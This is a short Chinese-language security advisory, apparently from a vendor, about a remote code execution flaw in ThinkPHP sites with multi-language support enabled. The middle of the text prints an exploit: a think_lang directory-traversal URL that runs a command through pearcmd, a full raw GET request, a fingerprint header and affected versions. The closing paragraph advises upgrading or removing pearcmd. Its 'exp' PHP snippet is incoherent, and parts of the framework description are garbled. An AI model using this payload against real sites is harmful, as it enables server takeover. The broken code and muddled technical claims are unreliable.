Thinkphp可以說是快捷、簡易的面向對象編程的一個微服務架構,PHP前端框架開發,創建于2006年,遵照Apache2的開源協議進行對外開放,目的是為了快速WEB應用程序開發和優化企業應用軟件開發而發展起來的。假如Thinkphp代碼開啟了多語言這個功能,hack就能通過POST、GET、COOKIES等方式將惡意參數插入進去發送到服務器中進行執行惡意代碼,并目錄穿越+文件包含,利用pearcmd文件含有這個trick就可以實現RCE遠程代碼執行漏洞。
使用thinkphp并開啟多語言的網站漏洞指紋如下:
header="think_lang"
漏洞影響版本范圍
v6.0.0<=ThinkPHP<=v6.0.13
v5.0.0<=ThinkPHP<=5.0.12
v5.1.0<=ThinkPHP<=5.1.8
漏洞利用詳情
#exp
pearcmd文件含有方法
$cmd=$_GET['cmd'];
$p=pearcmd;
$p->run($cmd);
目錄穿越
http://192.168.0.188:9999/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=DIR
能通過POST、cookies、GET等傳參的方式,進行目錄穿越和文件包含漏洞的利用,對thinkphp下的pearcmd文件進行遠程代碼命令執行,
HACK可以利用構造惡意的的URL,可以實現目錄穿越和文件包含,然后利用pearcmd文件含有對其服務器進行遠程命令執行。
這個漏洞利用的前提,必須要thinkphp開啟多語言這一功能,像一些外貿公司網站,一些企業網站,想使用多語言的網站都是可以利用該漏洞進行遠程代碼執行漏洞的。
具體的GET漏洞利用數據包如下:
GET/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=DIR
Host:192.168.0.188:9999
User-Agent:Mozilla/5.0(windowsNT10.0;Win32;x32;rv:79.0)Gecko/20100302Firefox/79.0
Accept:text/html,Application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.6,en-US;q=0.4,en;q=0.1
Accept-Encoding:gzip,deflate
Connection:close
Upgrade-Insecure-Requests:1
Cache-Control:max-age=0
如何對該thinkphp漏洞進行修復?
我們SINE安全建議廣大站長以及網站運營者,盡快的升級thinkphp到最高版本,目前Thinkphp官方在最新版本中修復了這個漏洞,也可以對該pearcmd文件進行強制刪除,待代碼漏洞修復后,還原該pearcmd文件,也可以找專業的網站安全公司進行代碼漏洞修復和整體的網站安全加固。
